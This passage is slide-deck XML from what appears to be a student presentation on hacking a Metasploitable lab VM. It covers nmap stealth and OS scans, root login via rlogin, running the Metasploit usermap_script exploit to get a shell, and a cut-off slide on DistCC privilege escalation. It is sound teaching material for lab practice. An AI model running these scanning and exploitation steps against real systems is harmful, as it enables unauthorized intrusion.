                </a:solidFill>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5942925" y="1292825"/>
            <a:ext cx="3312900" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>3632 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DistCCD network job distribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>5432 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PostgreSQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>5900 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VNC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>6000 X GUI login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>6667 IRC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>8009 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>… plus other unknown</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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6" name="Shape 416"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 41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Services in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/etc/init.d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="418" name="Shape 418"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1298752"/>
            <a:ext cx="9144000" cy="735145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Shape 419"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20825" y="2187050"/>
            <a:ext cx="9144000" cy="2770199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/etc/init.d/[name] [stop][start][restart]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>apache2, mysql, mysql-ndb-mgm, nfs-common, nfs-kernel-server, postfix, postgresql-8.3, proftpd, samba, openssh-server, tomcat5.5, waitnfs.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>apt-get remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>to remove the associated packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>apt-cache search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>to discover the package name</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x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Shape 6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Scanning Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 61"/>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i="1" lang="en"/>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t> Scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(-u)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>FIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packet to remote ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Closed: respond with proper RST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open: ignore query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Takes advantage of TCP’s proper behavior → works most of the time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealthier than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>SYN,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>especially over more time</a:t>
            </a:r>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3" name="Shape 423"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Shape 424"/>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Ports open after removal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Shape 425"/>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en"/>
              <a:t>Removal process is not that simple…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/etc/init.d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/etc/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/opt/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Startup entries </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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9" name="Shape 429"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Shape 430"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1583342"/>
            <a:ext cx="7772400" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Shape 431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Handsome Seastars</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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5" name="Shape 435"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 436"/>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en"/>
              <a:t>nmap -sS -O 192.168.74.134</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stealth Scan and OS Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We want ports 139 and 445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS is Linux 2.6.X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Shape 437"/>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Using NMAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="438" name="Shape 438"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="58976" t="30594"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674875" y="1798200"/>
            <a:ext cx="3515299" cy="3345300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Shape 439"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5681700" y="2786350"/>
            <a:ext cx="1083299" cy="1022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40" name="Shape 440"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674875" y="2888650"/>
            <a:ext cx="1124100" cy="1022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41" name="Shape 441"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674875" y="4178750"/>
            <a:ext cx="1546500" cy="3108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5" name="Shape 445"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Shape 446"/>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Logging Into TCP / as Root User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Shape 447"/>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rPr lang="en"/>
              <a:t>In the Metasploitable VM, type ‘rlogin -l root (ip address)’ in order to login as a root user. This uses 3 open TCP ports: 512, 513, and 514</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="448" name="Shape 448"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="46151" l="44790" r="14395" t="46360"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4200306"/>
            <a:ext cx="9144000" cy="943192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="449" name="Shape 449"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="30396" l="5346" r="80736" t="60243"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2780862" y="2770775"/>
            <a:ext cx="3582273" cy="1354650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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3" name="Shape 453"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Shape 454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1244250"/>
            <a:ext cx="3932699" cy="3899100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>I searched for exploits for Linux 2.6 and found the usermap_script exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>So type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit &lt;location&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> tells us it already selected port 139 but we still need to put our target’s ip in. Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set RHOST &lt;IP&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Finally type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>and it will open a shell to your target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Shape 455"/>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Exploiting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="456" name="Shape 456"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2302" l="0" r="47503" t="16640"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4389825" y="974750"/>
            <a:ext cx="4800350" cy="4169299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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0" name="Shape 460"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="461" name="Shape 461"/>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sz="3000"/>
              <a:t>Use the DistCC Daemon to escalate yourself to the root user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Shape 462"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="951787"/>
            <a:ext cx="8229600" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
